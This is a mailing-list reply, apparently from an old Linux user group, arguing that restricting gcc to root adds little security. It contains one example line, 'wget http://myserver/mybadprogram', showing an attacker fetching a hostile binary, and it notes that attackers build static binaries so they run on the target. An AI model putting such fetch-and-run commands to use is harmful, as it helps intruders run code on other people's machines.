[NTLUG:Discuss] Secure a system by securing GCC..

[Aaron Goldblatt]

> If execute rights to the GCC (and/or other directories) were revoked to all
> but the root user, wouldn't that reduce the chance of damage by keeping
> someone from compiling code to elevate their priveledges should they make it
> in?

There is an idea that you should disable anything the user doesn't need.

There are a couple problems this this particular suggestion, though.

First, some users may want to compile custom programs in ~/bin, which
you don't want to install.  That's a legitimate use of gcc.

Second, if someone has blown a hole in your system wide enough to drop
to a shell, compiling software is the least of your worries.  What's
more, if you have someting like wget installed (and who doesn't?),
disabling gcc has absolutely no effect on the attacker's ability to get
and execute code on your machine.  wget http://myserver/mybadprogram,
and boom, it's already downloaded and compiled.

An attacker smart enough to pull this off will also understand that
compiling a binary under a modern OS for transfer to another similar
machine (Linux ELF binary, using glibc2.0 or 2.1) just isn't that
difficult.  Three runs of the compiler (with appropriate setup, once for
libc, once for glibc2, and once for glibc2.1) is all I need to compile
MyTool.  If I do a static compilation (which is what a smart attacker
would do, because then he's not dependent on some library that may or
may not be missing or the wrong version or otherwise compromised on your
machine), I may need even less than that, at the expense of a larger
binary which isn't generally a problem anyway.

ag